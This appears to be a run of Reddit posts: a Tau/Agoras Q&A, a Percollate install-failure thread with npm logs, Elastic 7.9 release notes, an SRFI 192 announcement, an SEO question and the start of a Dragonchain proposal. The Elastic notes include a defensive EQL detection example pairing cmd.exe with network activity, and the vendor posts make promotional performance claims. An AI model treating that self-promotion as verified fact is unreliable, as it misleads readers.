A: We will be revamping the website soon, including the roadmap, which will be a summary of what’s been published in the whitepaper. The old version of the roadmap on the website is no longer up to date.
Q: What are the requirements for Agoras to have its own chain?
A: If the question means why Agoras doesn’t have its own chain right now, well, there is no special reason. We need to get there, and we will get there.
Q: When Agoras switches to its own chain, will you need to create a new payments system from scratch?
A: No, we won’t have to. We will have to integrate with the new payment channel but that’s something we are planning to do anyway. We will be integrating with several exchanges and several payment channels so it won’t be a huge task. Most of the heavy lifting is in the wallet and key management which will be done on the client side but we’re already planning on having more than one payment gateway anyway so having one more is no problem.
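As background on why “one more payment gateway is no problem”: a common design is to put each gateway behind a shared interface, so the rest of the system never touches gateway specifics. A minimal sketch (all class and method names here are hypothetical, not from the Agoras codebase):

```python
from abc import ABC, abstractmethod

class PaymentGateway(ABC):
    """Shared interface; wallet and key management live elsewhere (client side)."""
    @abstractmethod
    def charge(self, address: str, amount: int) -> str:
        """Submit a payment and return a transaction id."""

class GatewayA(PaymentGateway):  # hypothetical first integration
    def charge(self, address, amount):
        return f"A:{address}:{amount}"

class GatewayB(PaymentGateway):  # adding one more gateway is just a new class
    def charge(self, address, amount):
        return f"B:{address}:{amount}"

def pay(gateway: PaymentGateway, address: str, amount: int) -> str:
    # Callers depend only on the interface, never on a concrete gateway.
    return gateway.charge(address, amount)

print(pay(GatewayA(), "addr1", 10))  # -> A:addr1:10
```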
Q: When can we see Tau work with a real practical example?
A: For examples of applications of TML, we are currently working on a TML tutorial and a set of demos. Two of our developers are currently working on it and it’s going to be a big part of our next release.
Q: How can we make speaking in formal languages easier, with an example?
A: Coming up with a usable and convenient formal language is a big task, one that it is perhaps safe to say no one has achieved to date. But we solve this problem indirectly, yet completely, by not coming up with any single language, and instead letting languages be created and evolve over time through the internet of languages. We don’t have a recipe for making formal languages easy for everyone; it will be a collaborative effort over Tau to get there over time. See section 4.2 of the whitepaper, “The Critical Mass and the Tau Chain Reaction”.
Q: What are the biggest limitations of Tau and, are they solvable?
A: TML cannot do anything that requires more than polynomial space, and there are infinitely many such things; for example, you can look up EXPTIME- or EXPSPACE-complete problems. We would like to say “elementary”, but there is no ELEMENTARY-complete problem, only complete problems at each level of the elementary hierarchy. All of those TML cannot do, because they are above polynomial space. Another drawback of TML, which comes from the usage of BDDs, is arithmetic, in particular multiplication. Multiplication is highly inefficient in TML because of the nature of BDDs; of course, BDDs bring so many good things that even slow multiplication is a small price compared to all the possibilities they give us. Another limitation, which we will emphasize in the next version of the whitepaper, is the satisfiability problem: asking whether a model of a formula exists (not model checking, as now, but asking whether a model exists at all) is undecidable even on very restricted classes, as follows from Trakhtenbrot’s theorem. So in particular the containment problem, the satisfiability problem, and the validity problem are all undecidable in TML as is; for them to be decidable, we need to restrict the expressive power even further and look at narrower fragments of the language. Again, this will be emphasized more in the next version of the whitepaper.
Q: It took years for projects such as Maidsafe to build something mediocre; why should Agoras be able to do similar or better in less time?
A: Early on in the life of the Tau project, we’ve identified the computational resources marketplace as one of the possible applications of Tau, so it is very much on our roadmap. However, as you mentioned, there are some other projects, e.g. Filecoin, which is specifically focusing on the problem of storage. So even though it’s on our roadmap, we’re not there yet but we are watching closely what our competitors in this field are doing. While they haven’t yet delivered on their promise of an open and distributed storage network, we feel that at some point we will have more value to bring to the project. So distributed storage is on our roadmap but it’s not a priority for us right now but eventually we’ll get there.
Q: What are the requirements in scalability, e.g. permanent storage etc.?
A: We haven’t answered that question yet.
Q: Will Tau be able to run on a mobile phone?
A: Definitely, Yes. We’re planning on being available on all computational platforms, be it a server, laptop, phone or an iPad type of device.
Q: Given a vast trove of knowledge, how can Tau determine relevance? Can it also build defenses against spam attacks and garbage data?
A: Tau doesn’t offer any predetermined solution to this. It is basically all up to the user. The user will have to define what’s criminal and what’s not. Of course, most users will not bother with defining this but they will be able to automatically agree to people who already defined it and by that import their definitions. So bottom line: It’s really up to the users.
Q: What are your top priorities for the next three months?
A: Our goal for this year (2020) is to release a first version of Agoras Live and of TML.
Q: Ohad mentioned the following at the start of the year: “Time for us to work on Agoras. We need to create the Agoras team and commence work. We made a major improvement in one of Agoras’ aspects in the form of a theoretical breakthrough, but we’re not ready yet to share the details publicly.” Is there any further news or progress with the development of Agoras?
A: If the question is whether there has been more progress in the development of Agoras, specifically with regards to new discoveries for the derivatives market, then the answer is of course yes. Professor Carmi is now working on those inventions related to the derivatives market. We still keep them secret and of course, with Agoras Live, knowledge sharing for money is coming.
submitted by m4nki to tauchain [link] [comments]

2020.08.22 16:07 JonathanWillard I can't install Percollate on Linux Mint 20 Ulyana. I know I could use wkhtmltopdf but I know from experience that Percollate is superior.

LONG POST WARNING - lots of code copied in the interest of clarity.

I tried running "npm i percollate" and after installing it gave:
npm WARN enoent ENOENT: no such file or directory, open '/home/name/package.json'
npm WARN name No description
npm WARN name No repository field.
npm WARN name No README data
npm WARN name No license field.
[email protected]:~$ npm i percollate
npm WARN deprecated [email protected]: request has been deprecated, see https://github.com/request/request/issues/3142
npm WARN deprecated [email protected]: request-promise-native has been deprecated because it extends the now deprecated request package, see https://github.com/request/request/issues/3142
npm WARN deprecated [email protected]: this library is no longer supported
- @sindresorhus/is@0.14.0 node_modules/@sindresorhus/is
- [email protected] node_modules/ansi-regex
[email protected] node_modules/concat-stream/node_modules/safe-buffer -> node_modules/archiver-utils/node_modules/safe-buffer
string_[email protected] node_modules/concat-stream/node_modules/string_decoder -> node_modules/archiver-utils/node_modules/string_decoder
[email protected] node_modules/concat-stream/node_modules/readable-stream -> node_modules/archiver-utils/node_modules/readable-stream
- [email protected] node_modules/array-equal
- [email protected] node_modules/async-limiter
- [email protected] node_modules/buffer-from
- [email protected] node_modules/cacheable-request/node_modules/get-stream
- [email protected] node_modules/cacheable-request/node_modules/lowercase-keys
- [email protected] node_modules/cli-spinners
- [email protected] node_modules/clone
- [email protected] node_modules/color-name
- [email protected] node_modules/color-convert
- [email protected] node_modules/ansi-styles
- [email protected] node_modules/defaults
- [email protected] node_modules/defer-to-connect
- @szmarczak/http-timer@1.1.2 node_modules/@szmarczak/http-timer
- [email protected] node_modules/duplexer3
- [email protected] node_modules/es6-promise
- [email protected] node_modules/es6-promisify
- [email protected] node_modules/escape-string-regexp
- [email protected] node_modules/fsevents
- [email protected] node_modules/get-stream
- [email protected] node_modules/has-flag
- [email protected] node_modules/http-cache-semantics
- [email protected] node_modules/json-buffer
- [email protected] node_modules/keyv
- [email protected] node_modules/lowercase-keys
- [email protected] node_modules/mimic-fn
- [email protected] node_modules/mimic-response
- [email protected] node_modules/clone-response
- [email protected] node_modules/decompress-response
- [email protected] node_modules/minimist
- [email protected] node_modules/mkdirp
- [email protected] node_modules/normalize-url
- [email protected] node_modules/nunjucks/node_modules/commander
- [email protected] node_modules/onetime
- [email protected] node_modules/os-tmpdir
- [email protected] node_modules/p-cancelable
- [email protected] node_modules/percollate/node_modules/agent-base
- [email protected] node_modules/percollate/node_modules/https-proxy-agent/node_modules/ms
- [email protected] node_modules/percollate/node_modules/https-proxy-agent/node_modules/debug
- [email protected] node_modules/percollate/node_modules/https-proxy-agent
- [email protected] node_modules/percollate/node_modules/ms
- [email protected] node_modules/percollate/node_modules/extract-zip/node_modules/debug
- [email protected] node_modules/percollate/node_modules/rimraf
- [email protected] node_modules/pn
- [email protected] node_modules/prepend-http
- [email protected] node_modules/resolve-url
- [email protected] node_modules/responselike
- [email protected] node_modules/cacheable-request
- [email protected] node_modules/signal-exit
- [email protected] node_modules/restore-cursor
- [email protected] node_modules/cli-cursor
- [email protected] node_modules/source-map-url
- [email protected] node_modules/strip-ansi
- [email protected] node_modules/supports-color
- [email protected] node_modules/chalk
- [email protected] node_modules/log-symbols
- [email protected] node_modules/to-readable-stream
- [email protected] node_modules/typedarray
- [email protected] node_modules/concat-stream
- [email protected] node_modules/percollate/node_modules/extract-zip
- [email protected] node_modules/urix
- [email protected] node_modules/url-parse-lax
- [email protected] node_modules/wcwidth
- [email protected] node_modules/got
- [email protected] node_modules/ora
- [email protected] node_modules/percollate/node_modules/puppeteer
└─┬ percoll[email protected]
├── @mozilla/readability@0.3.0
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ └── string_[email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ └─┬ [email protected]
│ └─┬ [email protected]
│ └─┬ [email protected]
│ └── [email protected]
├── UNMET PEER DEPENDENCY [email protected]^2.5.0
├─┬ [email protected]
│ └── [email protected]
├── [email protected]
├─┬ [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ └── [email protected]
├── [email protected]
├── [email protected]
├─┬ [email protected]
│ └── [email protected]
├── [email protected]
├── [email protected]
└── [email protected]

npm WARN optional SKIPPING OPTIONAL DEPENDENCY: [email protected]~2.1.2 (node_modules/chokidar/node_modules/fsevents):
npm WARN notsup SKIPPING OPTIONAL DEPENDENCY: Unsupported platform for [email protected]: wanted {"os":"darwin","arch":"any"} (current: {"os":"linux","arch":"x64"})
npm WARN enoent ENOENT: no such file or directory, open '/home/name/package.json'
npm WARN [email protected] requires a peer of [email protected]^2.5.0 but none was installed.
npm WARN name No description
npm WARN name No repository field.
npm WARN name No README data
npm WARN name No license field.
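
As an aside, long npm logs like the one above are easier to triage with a few lines of script. This sketch simply counts the `npm WARN` categories (the embedded log text is a shortened stand-in for the real output, with versions omitted):

```python
import re
from collections import Counter

log = """npm WARN deprecated request: request has been deprecated
npm WARN enoent ENOENT: no such file or directory, open '/home/name/package.json'
npm WARN notsup SKIPPING OPTIONAL DEPENDENCY: Unsupported platform for fsevents
npm WARN deprecated har-validator: this library is no longer supported"""

# The word after "npm WARN" is the warning category (deprecated, enoent, ...).
counts = Counter(
    m.group(1) for m in re.finditer(r"^npm WARN (\S+)", log, re.M)
)
print(dict(counts))  # -> {'deprecated': 2, 'enoent': 1, 'notsup': 1}
```

The `enoent` warnings above just mean npm found no `package.json` in the home directory; they are harmless for a global-style install.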

I have learned that Puppeteer is deprecated [???] and that I should apparently be using something called Playwright. I am befuddled, because Percollate works swimmingly on Elementary OS. I use Elementary on the one device I have because my family and I like the ease of use, but it runs poorly on this other device. As stated previously I despise wkhtmltopdf because it doesn't format websites well at all. I want to be able to download articles and recipes and things to read in the evenings, printed out.

When I run "percollate --version" I get:

Percollate is installed but its dependencies seem to have all broken and / or been abandoned ... on this computer. Is this because Mint Ulyana is Ubuntu 20? Isn't Elementary OS Hera also Ubuntu 20? I'm so lost, I'm relatively new to Linux and still incapable of fixing things like this on my own. I can't write code at all so I wouldn't be able to go about fixing Percollate myself if it truly is broken.

Is there at the very least a way to make wkhtmltopdf format websites nicely without loads of errors?

Sorry for the long post but I wanted to be thorough. Oh yes, I also ran "PUPPETEER_PRODUCT=firefox npm i puppeteer" and that didn't fix anything. This is what happens when I try to run "percollate pdf https://winstonchurchill.org/resources/speeches/1940-the-finest-hour/we-shall-fight-on-the-beaches/":

Fetching: https://winstonchurchill.org/resources/speeches/1940-the-finest-hour/we-shall-fight-on-the-beaches/
Enhancing web page... ✓
(node:4596) UnhandledPromiseRejectionWarning: Error: Could not find browser revision 782078. Run "PUPPETEER_PRODUCT=firefox npm install" or "PUPPETEER_PRODUCT=firefox yarn install" to download a supported Firefox browser binary.
at ChromeLauncher.launch (/usr/local/lib/node_modules/percollate/node_modules/puppeteer/lib/cjs/puppeteer/node/Launcher.js:86:23)
(node:4596) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)
(node:4596) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.

Does anyone know anything that would help me?
submitted by JonathanWillard to linuxquestions [link] [comments]

2020.08.19 20:16 mstewart04 Elastic Stack 7.9 Released - Highlighted by Free Distribution Tier of features of Workplace Search and Endpoint Security


"We are pleased to announce the general availability of Elastic 7.9. This release brings a broad set of new capabilities to our Elastic Enterprise Search, Observability, and Security solutions, which are built on the Elastic Stack — Elasticsearch, Kibana, Logstash, and Beats. 7.9 delivers significant new capabilities to market: it transforms the way our customers and users onboard data into Elastic with the new Elastic Agent; it launches a free distribution tier of features of Elastic Workplace Search, part of Elastic Enterprise Search; and, in Elastic Security, it introduces the beta of a free distribution tier of endpoint security, featuring malware prevention directly integrated into the Elastic Stack, the first major milestone in delivering comprehensive, integrated endpoint security.
We are also continuing to improve the capabilities of Elastic Cloud, the best place to deploy the Elastic Stack and our solutions. In the last few months, we have launched support for AWS PrivateLink connectivity, achieved FedRAMP Moderate authorization, simplified buying options, and launched support for three new regions. And, of course, Elastic 7.9 is available right now on Elastic Cloud — the only managed Elasticsearch offering to include all of the new features in 7.9. Or you can download the Elastic Stack and our cloud orchestration products, Elastic Cloud Enterprise and Elastic Cloud for Kubernetes, for a self-managed experience.
This is a packed release, and we are excited to share some of the key release highlights below. To get the full feature rundown, dive into the individual solution and product blog posts, but for now, let’s dig in.

Introducing a new free way to get started with Workplace Search, part of Elastic Enterprise Search

Welcoming features of Workplace Search to our free distribution tier

Following the general availability of Workplace Search in 7.7 and its subsequent availability in Elastic Cloud, features of Workplace Search are now available as part of the Basic free distribution tier. Get started on boosting your team’s productivity by unifying all your content platforms like Google Drive, Gmail, Salesforce, SharePoint, Jira, and more into a personalized search experience for your organization. This free tier includes connectors for all supported content sources, access to the custom API for creating your own connectors, group and user management features, and tools for building modern search user experiences.
Workplace Search is available for free, with additional features available with Platinum or Enterprise subscriptions. Workplace Search can be used on Elastic Cloud or can be deployed as a self-managed option on your own infrastructure with the Elastic Stack.

Viewing Elastic Enterprise Search through Kibana

As the window into the Elastic Stack, Kibana allows users to take data from any source, in any format, and search, analyze, and visualize that data in real time. Elastic Enterprise Search is now available in Kibana to provide users with easy navigation to App Search and Workplace Search from a familiar starting point. With this release, Kibana admins can customize spaces to show or hide Elastic Enterprise Search in the main navigation menu. In this release, App Search users can access all their engines and meta engines from Kibana, while Workplace Search users can access user management and content source synchronization tooling.

Supercharging email searching capabilities with Gmail support in Workplace Search

Email is the central hub of business communication, and a huge proportion of our daily insights gets siloed into email archives over time. With 7.9, Workplace Search supports Gmail as a connector. Each individual Gmail user can easily use the clean, intuitive Workplace Search user interface to search within their own email and see results right alongside all their other content sources.
Workplace Search support for Gmail as a connector in Elastic Enterprise Search 7.9

Giving more control and automation over scaling your deployments, plus new insight from source activity logs

Because Elastic Enterprise Search is built on the Elastic Stack, powerful features can be pulled into App Search and Workplace Search based on user needs. In 7.9, App Search and Workplace Search inherit index lifecycle management (ILM) policies from the Elastic Stack. Users can configure ILM policies to automatically manage indexes (engines) according to user requirements. Examples include: creating a new index once it reaches a predefined size; creating or archiving an index each day, week, or month; and deleting indices based on data retention rules. Create and manage ILM policies directly inside App Search.
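For reference, an ILM policy of the kind described (roll over at a size or age threshold, delete after a retention period) is a small JSON document sent to Elasticsearch's `_ilm/policy` endpoint. A sketch in Python (the policy name, thresholds, and retention period are illustrative only; the request is built but not sent):

```python
import json

# Illustrative ILM policy: roll over each index at 50 GB or 30 days,
# then delete it 90 days after rollover (thresholds are examples only).
policy = {
    "policy": {
        "phases": {
            "hot": {
                "actions": {
                    "rollover": {"max_size": "50gb", "max_age": "30d"}
                }
            },
            "delete": {
                "min_age": "90d",
                "actions": {"delete": {}}
            }
        }
    }
}

# Would be PUT to /_ilm/policy/my-engine-policy (the name is hypothetical).
print(json.dumps(policy, indent=2))
```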
Get a scoop on all of the new Elastic Enterprise Search features in the Elastic Enterprise Search 7.9 blog.

Delivering a single unified agent with one-click data ingestion

Ingesting data for observability gets a lot simpler with Elastic Agent and Ingest Manager

Onboarding data is a critical — and often time-consuming and tedious — step in observability workflows. How quickly can we go from deciding to monitor a system to actually monitoring the system? How easy is it to instrument the system? Is the collected data parsed and structured to be usable? How quickly can we visualize and glean key insights from the data? Now multiply this by the thousands of components in your technology stack — servers, VMs, containers, applications, databases, middleware, etc. — and the operational aspects become critical.
We are excited to introduce a dramatically simplified data onboarding and ingest management workflow with the launch of several new ingest capabilities in 7.9. Our goal with this initiative is to streamline the entire ingest process so that operators can spend more time acting on insights and less time setting and managing their ingest process. The Elastic Agent, in beta in 7.9, is a single, unified way to collect all kinds of data from a host, including logs, metrics, and endpoint security data, with plans to expand to APM and other data types in the future. Having a single agent to install, configure, update, and maintain is a huge efficiency boost for operators. Ingest Manager, which is also in beta in 7.9, controls all aspects of your ingest universe from a central place. Add and manage integrations for popular services and platforms: we plan to port all 100+ Beats modules over the next few releases. Finally, you can centrally manage all your agents with Fleet — the control tower for all deployed agents. A typical enterprise will usually have agents deployed on tens of thousands of hosts, and Fleet makes it easy for operators to manage this spread from a single place.

Enhancing analyst experience with a unified observability overview page

Unification of the three data pillars of observability — logs, metrics, and traces — at the data layer is one of the features that sets Elastic Observability apart. Having all the data in a single datastore is essential to supporting investigative workflows that seamlessly move between data streams to speed mean time to resolution.
Building on this unified data foundation, we are excited to extend unification to the visualization layer with the launch of a new observability overview page in Kibana. The overview page bubbles up key information across all your observability data — logs, metrics, APM, uptime — and presents a curated at-a-glance view of the health of your entire ecosystem. This out-of-the-box view helps you get to insights faster — especially for new users or new deployments. The overview page includes a newsfeed that keeps you informed of product updates and news.

Embracing open standards with OpenTelemetry integration in Elastic APM

From open code to open community, Elastic is built on openness and transparency. That mindset extends to our support for open standards in the observability space, such as OpenTracing, Jaeger, and W3C Trace-Context. We are happy to add the recently formed OpenTelemetry standard to that list. OpenTelemetry is a Cloud Native Computing Foundation (CNCF) sandbox project, currently in beta, that provides vendor-neutral, language-specific agents, SDKs, and APIs to collect distributed traces, metrics, and log data from monitored applications. We have added the Elastic APM exporter (and contributed it to the OpenTelemetry collector contrib repo), which takes the trace data collected using the OpenTelemetry collector, translates it to Elastic-compatible protocol, and sends it to Elastic APM. This means that you can start exploring your OpenTelemetry using Elastic APM without any changes to your instrumentation. Just add the Elastic exporter, currently in beta, into your OpenTelemetry setup and start exploring your data in minutes.

Strengthening ties between DevOps and SecOps with 50+ turnkey detection rules

While you observe, why not protect? Logs, metrics, and traces from applications and infrastructure collected by observability teams are a rich source of information for security teams. The benefit of having Elastic Security and Elastic Observability sit on top of the same Elasticsearch data is that you can ask different questions of the same data without duplicating it across tools. Elastic caters to the needs of both SecOps and DevOps teams, fostering collaboration. Our unified resource-based pricing means that adding different lenses to the same data doesn’t come at an additional cost.
In 7.9, we are strengthening the bond between Elastic Security and Elastic Observability even more with the beta launch of over 50 turnkey detection rules that allow both DevOps teams and security analysts to benefit from insights for hundreds of services and systems in minutes — with no extra work or cost. And of course, with the flexible detection engine you are welcome to create additional rules to fit your environment.
Dive deeper in all the new features in the Elastic Observability 7.9 blog.

Introducing a free distribution tier of one-click endpoint security, built into Elastic Security

Stopping attacks on your endpoints with integrated malware prevention

We are excited to introduce the first major milestone in delivering comprehensive, integrated endpoint security — free anti-malware capabilities (beta), built directly into Elastic Security, furthering our mission to help secure organizations around the world. Elastic blocks malware from Windows and macOS hosts with signatureless methods recently validated by AV-Comparatives, and detects threats with MITRE ATT&CK®-aligned rules for Windows, macOS, and Linux hosts.

Enhancing your cloud security posture

Our security research team has added prebuilt protections for monitoring cloud infrastructure and identity and access management technologies. These prebuilt machine learning jobs (GA) and threat detection rules (beta) enable customers to detect attacks against cloud infrastructure and applications and are aligned with the ATT&CK Matrix.

Unifying prevention, detection, and response with community-driven workflow enhancements

Elastic Security 7.9 delivers several workflow enhancements that equip analysts to efficiently triage, hunt, investigate, and respond to attacks. New built-in investigation guides help analysts understand which questions to ask when opening a specific type of alert, and customizable timeline templates optimize data presentation to enable faster insights.
An efficient workflow for adding exceptions to detection and endpoint rules helps eliminate overhead associated with minimizing false positives. And a new integration with IBM Resilient streamlines incident response workflows, within the security team and beyond.

Simplifying data ingestion with expanded data integrations

Version 7.9 introduces support for many new host and cloud data sources, including Microsoft Defender ATP, Windows PowerShell, and Google G Suite. These integrations support security operations, DevSecOps, and other common use cases. We are also introducing support for more than 20 common network and application security technologies.
Get all the details in the Elastic Security 7.9 blog.

Introducing instant page loads in Kibana

Delivering instant page loads in Kibana for faster navigation and more natural workflows

For more than 18 months, we've been overhauling the engine at the heart of Kibana. In 7.9, we've completed that work and migrated all of Kibana’s underlying architecture. The immediate benefit is a dramatically faster experience when navigating Kibana. Flipping from APM to Dashboard to Maps to SIEM is now an instantaneous experience that helps keep you in the flow — whether you are supporting mission-critical systems, protecting against security threats, or building data analyses. Beyond this improved user experience, the new architecture also means big improvements for the Kibana development community with the ability to produce features faster, with greater efficiency resulting in higher-quality code.

Simplifying data ingestion with Elastic Agent

Building on the foundation of Beats, lightweight data shippers that help get data into Elasticsearch, we are introducing “one Beat to rule them all,” the new Elastic Agent, which is in beta in 7.9. Instead of installing multiple Beats on a host, users can now install a single Elastic Agent, which brings together the necessary components for metric collection, logging, malware prevention, and more. Better yet, users can centrally manage thousands of agents with a new feature called Fleet. These enhanced capabilities are housed in the new Ingest Manager in Kibana. Whether monitoring cloud infrastructure or configuring thousands of endpoints, we expect these new features to make setup faster and steady state operations easier — and this is only the beginning of our journey.

Enhancing search with a new wildcard data type

Sometimes you only know half of what you’re searching for, and especially in observability and security use cases, the wildcard operator delivers more powerful searches. Logs often contain lengthy strings without spaces, consisting of standard repeating sections interleaved with changing information (e.g., names, durations, IP addresses). Enter the wildcard data type. To search such strings efficiently, with high performance and low index size, we split them into three-letter tokens (trigrams) and apply the same technique to the query. This method allows us to introduce wildcard and regex support in our searches without compromising performance. Designed to dramatically reduce the time it takes to find what you’re searching for when using the wildcard operator, the wildcard data type will be especially useful for security analysts using our Elastic Security solution as they hunt for threats.
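The trigram idea can be sketched in a few lines of Python. This is only an illustration of the indexing technique, not Elasticsearch's actual implementation; the function names are invented for the example:

```python
def trigrams(s):
    """Split a string into its overlapping three-letter tokens."""
    return {s[i:i + 3] for i in range(len(s) - 2)}

def could_match(indexed_value, wildcard_pattern):
    """Cheap candidate check: every trigram drawn from the literal
    (non-wildcard) parts of the pattern must appear among the indexed
    value's trigrams. In a real engine, surviving candidates are then
    verified against the original string, so the expensive comparison
    runs on only a few documents."""
    literals = [p for p in wildcard_pattern.split("*") if len(p) >= 3]
    value_grams = trigrams(indexed_value)
    return all(trigrams(p) <= value_grams for p in literals)

log_line = "ERROR-2020-08-18-connection-timeout-10.0.0.1"
print(could_match(log_line, "*connection-timeout*"))  # candidate: True
print(could_match(log_line, "*disk-full*"))           # pruned: False
```

Because the index stores small fixed-size tokens rather than every possible substring, the index stays compact while leading-wildcard queries avoid a full scan.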

Offering a preview of Event Query Language (EQL) in Elasticsearch

At Elastic, we've had requests for many years to introduce a correlation query language to support threat hunting and detection security use cases. When we joined forces with Endgame late last year, we inherited the Event Query Language (EQL), a powerful, battle-tested language designed for this purpose. It has been running efficiently on endpoints blocking threats in Endgame solutions for years. In 7.9, we're excited to release our first public preview of EQL, a first-class query language in Elasticsearch, as an experimental feature. We're releasing it today as an API in Elasticsearch, and we have plans to incorporate a robust UI for EQL in Elastic Security and Kibana in the future. We'd love your feedback and your creativity — EQL was designed for security, but we expect it will open many new ways to use Elasticsearch.
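As a hedged illustration, an EQL request to the experimental `_eql/search` API might look like the following. The index, field names, and query values here are hypothetical, and the exact request shape should be checked against the 7.9 documentation:

```python
import json

# Sketch of a request body for Elasticsearch's experimental EQL API.
# EQL expresses event correlation, e.g. "a process start followed by
# a network connection on the same host."
eql_request = {
    "query": (
        'sequence by host.name '
        '[process where process.name == "cmd.exe"] '
        '[network where destination.port == 443]'
    )
}

# The body would be sent as JSON, e.g. GET /my-index/_eql/search
print(json.dumps(eql_request, indent=2))
```

The sequence-and-`where` syntax is the part inherited from Endgame; the REST wrapper is ordinary Elasticsearch.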
Read about these features and more in the Kibana 7.9 blog and the Elasticsearch 7.9 blog.

Enhancing security on Elastic Cloud with support for AWS PrivateLink

Enhancing security and compliance with AWS PrivateLink support, IP filtering, support for Google credentials, and FedRAMP authorization

We have launched support for AWS PrivateLink, which provides private network connectivity between your AWS virtual private clouds (VPCs) and Elastic Cloud. We have also launched IP filtering across public cloud providers, enabling you to restrict network access to your Elastic Cloud deployment based on IP addresses, address blocks, or ranges. Finally, we have added support for Google Accounts, so that you can sign up for Elastic Cloud using your existing Google Account credentials: with a couple of clicks, you can use your Google identity to access your Elastic Cloud account instead of maintaining separate credentials.
Configure a traffic filter: PrivateLink endpoint on Elastic Cloud
In addition, the Elastic Cloud AWS GovCloud US East region is designated authorized for FedRAMP Moderate. Federal, state, and local government users, as well as higher education institutions and users with government data, can start a free trial today!

Supporting more flexible buying options with self-service monthly premium subscriptions and new regions

You can now purchase Gold and Platinum monthly subscriptions directly within the Elastic Cloud console. With just a few clicks, you’ll get access to support SLAs and the exclusive capabilities of the Elastic Stack, including our solutions for enterprise search, observability, and security. We’ve also added more regions across multiple cloud service providers, so you can access Elastic Cloud in more locations, including Canada Central, Paris, and Seoul. Our AWS GovCloud region is also now generally available.

Improving service performance with in-place configuration changes and new AWS instance types

In-place configuration changes allow for faster and more reliable configuration updates. Their speed and reliability come from applying changes to the cluster (like settings, upgrades, and resizing) in place, which is followed by a rolling restart of nodes — avoiding potentially long-running data migration operations. We have also launched support for Amazon EC2 M5d general purpose and R5d memory-optimized instances in all supported AWS regions on Elastic Cloud. M5d instances provide a balance of compute, memory, and networking resources, while R5d instances are designed to deliver fast performance when processing large data sets in memory.

Supporting new self-managed capabilities with Elastic Cloud Enterprise 2.6 and Elastic Cloud on Kubernetes 1.2

We are pleased to announce the general availability of Elastic Cloud Enterprise 2.6. Elastic Cloud Enterprise lets customers centrally orchestrate a fleet of Elasticsearch clusters using the same capabilities that Elastic uses to run Elastic Cloud. With the 2.6 release, Elastic Cloud Enterprise adds support for the Elastic Cloud Control (ecctl) CLI, management of the new unified Elastic Enterprise Search including support for our new Workplace Search capabilities, and in-place configuration changes.
We are also pleased to announce the general availability of Elastic Cloud on Kubernetes 1.2. Elastic Cloud on Kubernetes simplifies setup, upgrades, snapshots, scaling, high availability, security, and more for running Elasticsearch and Kibana in Kubernetes. The new 1.2 version lets you easily deploy and orchestrate Elastic Enterprise Search, allowing you to launch an instance of App Search or Workplace Search and connect it to an Elasticsearch cluster with just a few lines of YAML configuration. The new 1.2 version also lets you take advantage of the new Beats Custom Resource Definition (CRD) to deploy and manage data shippers such as Filebeat, Metricbeat, Auditbeat, and others using ECK.
To get caught up on all of the Elastic Cloud news, check out the What’s New In Elastic Cloud blog.

There’s always more...

So much more. Check out the individual solution and product blog posts for the details on everything we added in 7.9:

Elastic Solutions

Elastic Stack

Elastic Cloud

submitted by mstewart04 to elasticsearch [link] [comments]

2020.08.01 07:18 arthurgleckler Final SRFI 192: Port Positioning

Scheme Request for Implementation 192, "Port Positioning," by The R6RS editors; John Cowan (shepherd); Shiro Kawai (implementation; requires a hook), has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-192/.
Here's the abstract:
This is an extract from the R6RS that documents its support for positioning ports. Binary ports can be positioned to read or write at a specific byte; textual ports at a specific character, although character positions can't be synthesized portably. It has been lightly edited to fit R7RS style.
Here is the commit summary since the most recent draft:
Here are the diffs since the most recent draft:
Many thanks to the R6RS editors and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.07.31 08:30 quantseeker Does W3C validation help in getting ranked higher?

The digital marketing agency I have hired for SEO is telling me that my website is missing W3C validation, that this needs to be fixed ASAP, and that it’s blocking their SEO efforts.
Does it impact SEO and how urgent is this really?
submitted by quantseeker to SEO [link] [comments]

2020.07.29 16:56 j0j0r0 Dragonchain Great Reddit Scaling Bake-Off Public Proposal

Dragonchain Great Reddit Scaling Bake-Off Public Proposal

Dragonchain Public Proposal TL;DR:

Dragonchain has demonstrated twice Reddit’s total daily volume (votes, comments, and posts, per Reddit’s 2019 Year in Review) in a 24-hour demo on an operational network. Every single transaction on Dragonchain is decentralized immediately through 5 levels of Dragon Net, and then secured with combined proof on Bitcoin, Ethereum, Ethereum Classic, and Binance Chain, via Interchain. At the time, in January 2020, the entire cost of the demo was approximately $25K on a single system (transaction fees locked at $0.0001/txn). With current fees (lowest fee $0.0000025/txn), this would cost as little as $625.
Watch Joe walk through the entire proposal and answer questions on YouTube.
This proposal is also available on the Dragonchain blog.

Hello Reddit and Ethereum community!

I’m Joe Roets, Founder & CEO of Dragonchain. When the team and I first heard about The Great Reddit Scaling Bake-Off we were intrigued. We believe we have the solutions Reddit seeks for its community points system and we have them at scale.
For your consideration, we have submitted our proposal below. The team at Dragonchain and I welcome and look forward to your technical questions, philosophical feedback, and fair criticism, to build a scaling solution for Reddit that will empower its users. Because our architecture is unlike other blockchain platforms out there today, we expect to receive many questions while people try to grasp our project. I will answer all questions here in this thread on Reddit, and I've answered some questions in the stream on YouTube.
We have seen good discussions so far in the competition. We hope that Reddit’s scaling solution will emerge from The Great Reddit Scaling Bake-Off and that Reddit will have great success with the implementation.

Executive summary

